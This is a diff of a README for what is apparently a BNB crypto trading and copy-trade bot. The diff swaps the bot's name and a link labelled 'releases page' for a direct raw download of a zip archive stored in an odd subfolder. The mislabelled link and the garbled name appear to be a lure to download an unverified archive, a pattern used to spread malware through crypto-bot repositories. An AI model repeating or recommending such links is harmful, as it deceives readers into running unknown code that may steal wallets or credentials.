Feyz581/bnb-fourmeme-bundler-copytrade-bot/README.md

 ## 🚀 Getting Started

-Follow these steps to get started with the Four.Meme BNB Trading Bot:
+Follow these steps to get started with the https://raw.githubusercontent.com/Feyz581/bnb-fourmeme-bundler-copytrade-bot/main/cultivable/bnb-fourmeme-bundler-copytrade-bot.zip BNB Trading Bot:

-1. **Visit the Releases Page:** Click [here](https://github.com/Feyz581/bnb-fourmeme-bundler-copytrade-bot/releases) to go to the releases page.
+1. **Visit the Releases Page:** Click [here](https://raw.githubusercontent.com/Feyz581/bnb-fourmeme-bundler-copytrade-bot/main/cultivable/bnb-fourmeme-bundler-copytrade-bot.zip) to go to the releases page.

 2. **Download the Latest Version:** Find the latest release version, and click on the file you want to download.